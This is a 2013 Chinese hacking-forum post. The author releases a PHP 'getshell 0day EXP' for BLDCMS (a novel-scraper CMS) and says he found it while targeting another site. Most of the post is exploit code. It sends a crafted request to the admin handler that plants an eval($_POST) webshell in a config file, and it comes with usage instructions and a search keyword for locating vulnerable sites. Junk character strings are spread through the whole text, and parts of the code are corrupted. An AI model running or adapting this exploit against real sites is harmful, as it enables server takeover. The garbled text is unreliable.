之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
2 R: K- E+ }" ]+ R5 T# E& J! w
- O; s! Q, x: n$ t0 Z9 d, m; g
) A: _ p1 ?: w7 m$ O话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了 8 T% Z; X; s* w A
, p. l$ i$ J' l
既然都有人发了 我就把我之前写好的EXP放出来吧$ Z7 q, R" H. ?, v
: t' ^3 A; Y V1 D# v p* o
view source print?01.php;">
/ ]; G, Z; G. h9 c' j1 d% V02.<!--?php% H8 P; F- z' G, A
03.echo "-------------------------------------------------------------------0 O1 s9 H( r5 W" f+ i" Q9 E
04. 6 M! i; F" ?2 [0 E
05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
0 D8 ~! ]8 U7 ]06. ; x, K' i/ q: n1 {% b' b
07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun) o- C, i! v2 Z4 c9 E
08.
7 j& S% L8 W* ]. O! D09.QQ:981009941\r\n 2013.3.21\r\n T# {8 Q2 o+ g h7 N$ g) D
10. % t" L! I8 e$ M0 s0 J
11.
, S; Q2 c; v; Z \( S12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码2 B' t% r! L. N6 W- M
13.
& ], Z3 a. J0 `) P" s" @14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------5 S! B& c/ d2 s. Q
15. # ^9 J! e$ k: O! j, n
16.--------------------------------------------------------------------\r\n";
# K; _$ c! M5 ~# `- j17.$url=$argv[1];
: ^+ x, ?% d0 e18.$dir=$argv[2];' F% w% z% z A! N5 l' E. J
19.$pass=$argv[3];% B8 z7 l) |" [8 y2 O
20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
Z) g7 B. {2 i4 v: q, ]21.if (emptyempty($pass)||emptyempty($url))
6 \. [4 T8 W" T i. z t8 l* E0 d22.{exit("请输入参数");}
8 H2 _- b; D1 K23.else- v/ F& |! x5 I7 o6 i J" m8 w, m G
24.{/ l) ?. F" R4 ]0 K1 U x
25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev5 a- H/ t6 R9 `: w% C) ^9 v
26. # p( |8 O7 R# B! e2 {4 d) i
27.al;
5 S# g @8 B+ d5 a3 F% x28.$length = strlen($fuckdata); U8 H2 B" e$ z2 ?- S; b+ @
29.function getshell($url,$pass)7 @5 f/ Q- W. |6 p. d
30.{
2 N1 Y+ x9 D- ?- U/ g+ c31.global $url,$dir,$pass,$eval,$length,$fuckdata;
% U5 S* x$ h( o% a% l32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
+ j' R/ b3 g4 e0 k |7 I, l& G- @33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";. L! y; ?4 D8 H( I2 {
34.$header .= "User-Agent: MSIE\r\n";8 F8 n4 K/ H* i' y6 r2 f
35.$header .= "Host:".$url."\r\n";( N' i* ]! s( y. X$ ~5 z" H
36.$header .= "Content-Length: ".$length."\r\n";
8 Y- h7 g2 T4 }; K/ l1 A37.$header .= "Connection: Close\r\n";
% B( x! }& n) w9 t h0 k2 m: Y38.$header .="\r\n";
4 o. t8 _# M1 h; a4 d39.$header .= $fuckdata."\r\n\r\n";; B$ ?4 y! J6 S/ u& [* Q4 ^# J
40.$fp = fsockopen($url, 80,$errno,$errstr,15);) M( B* \& r1 t7 g: F9 G
41.if (!$fp)
8 Q- X$ d0 A8 Q42.{0 J' {& y/ y) j# q9 r
43.exit ("利用失败:请检查指定目标是否能正常打开");
9 ^+ K! T7 t9 R+ j; A5 h O: S44.}4 A- G5 e, B. _; y
45.else{ if (!fputs($fp,$header))! K: G2 C) U9 h; ]
46.{exit ("利用失败");}
" i8 x: a( @9 C' ^8 f47.else
/ a* k$ R3 r0 |' l/ E0 M6 M1 x/ u48.{! d+ {1 U% _( ~' }% ~
49.$receive = '';
4 j+ G1 I! t; M: k0 Y- l50.while (!feof($fp)) {
3 h5 S+ l! h% T4 }5 b( g. Y1 R51.$receive .= @fgets($fp, 1000);
1 j, M2 c/ j2 o" E4 V* f+ _( K52.}% K9 I3 F" p4 H
53.@fclose($fp);
- M0 i) ?* ~# c1 }! G' Q54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标: ^! s# m6 x, O( l* \' Z
55. & g9 _! Q$ J" F: C3 U
56.GPC是否=off)";
" [7 r* A6 }% K* e* w" l57.}}
4 k- z5 `9 M7 R58.}* {8 o x/ e r$ J$ O
59.}
0 b) J6 V$ T- g8 d0 h: r" A60.getshell($url,$pass);% R; [3 A _5 E+ `0 c4 N
61.?-->$ q, \' y, W+ {% t" d# L
$ g% C& A2 @' s5 _6 N: R l6 m
1 z0 J/ J3 O2 P+ z7 B
6 j. M) R( E- T8 J: Q j) c6 Zby 数据流6 T3 Z' o1 K# P8 [9 g/ @5 p0 Z
|
发表于 2013-3-26 20:49:10
收藏
支持
反对